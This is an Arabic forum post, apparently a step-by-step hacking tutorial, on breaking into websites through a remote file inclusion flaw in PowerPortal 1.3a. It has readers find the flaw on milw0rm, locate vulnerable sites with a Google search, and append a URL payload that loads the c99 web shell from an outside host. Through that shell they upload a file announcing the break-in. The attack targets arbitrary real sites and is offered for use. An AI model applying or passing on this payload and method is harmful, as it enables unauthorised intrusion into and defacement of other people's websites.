السلام عليكم ورحمه الله وبركاته ..
استمتع مع شرح الحشاش طيايوووتفضلو الدرس
بسم الله الرحمن الرحيم
نبدأ الدرس
(درس إختراق المواقع عن طريق ثغرات الفايل انكلود)
اول شىء ندخل إلى موقع من مواقع الثغرات
www.milw0rm.comتظهر لنا الصورة التالية :
ننزل إلى القسم المسمى
WEb apps
<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_1 width=500><tr><td class=td1 width=20>
</TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x742 والحجم 391 كيلوبايت .</TD></TR></TABLE>
و نختار اول ثغرة من الأعلى المسماة بإسم
PowerPortal 1.3a (index.php) Remote File Include Vulnerability
الان نقوم بشرح اسم الثغرة
اول جزء
PowerPortal 1.3a
هذا اسم الإسكربت المصاب بالثغرة
(index.php)
هذا اسم الملف المصاب
Remote File Include Vulnerability
هذا نوع الثغرة و واضح انها من نوع فايل انكلود و هذا اسهل نوع من انواع الثغرات تقريبا
تظهر لنا الثغرة بهذا الشكل و الشرح على الصورة
<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_2 width=500><tr><td class=td1 width=20>
</TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x768 والحجم 142 كيلوبايت .</TD></TR></TABLE>
الان فهمنا كل اجزاء الثغرة و طبعا هذا يرجع إلى قوتك فى اللغة الإنجليزية
الان ندخل إلى جوجل و نكتب الجزء الذى لونته فى الصورة السابقة لكى تظهر لنا المواقع المصابة
<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_3 width=500><tr><td class=td1 width=20>
</TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x742 والحجم 233 كيلوبايت .</TD></TR></TABLE>
سنقوم بإختيار موقع منهم و نتابع الصورة :
الان سنحذف كلمة
top.php
و نضغط الاتى
كود:
/index.php?file_name[]=http://www.soqor.net/tools/c99.txt?
بعد اسم الموقع
و نضغط
enter
لكى تظهر لنا الصفحة التالية
<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_4 width=500><tr><td class=td1 width=20>
</TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x742 والحجم 193 كيلوبايت .</TD></TR></TABLE>
الان ننزل إلى اسفل الصفحة إلى خانة
upload
و نضغط على زر
browse
لكى نحدد ملف لكى نرفعه لنعلن عن اختراقنا للموقع
و نضغط
upload
كما فى الصورة
<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_5 width=500><tr><td class=td1 width=20>
</TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x742 والحجم 148 كيلوبايت .</TD></TR></TABLE>
والنتيجه
<table class=ncode_imageresizer_warning id=ncode_imageresizer_warning_6 width=500><tr><td class=td1 width=20>
</TD>
<td class=td2 unselectable="on">هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 1024x742 والحجم 73 كيلوبايت .</TD></TR></TABLE>
تم بحمد الله الدرس
طبعا مره حطيت الدرس هذا بالقراصنه
ضافني واحد يدعي انه نت فيرس
وسوووا قلق وحاله
الله يخلي البلوك
واذا في شيء مش واضح انا جاهز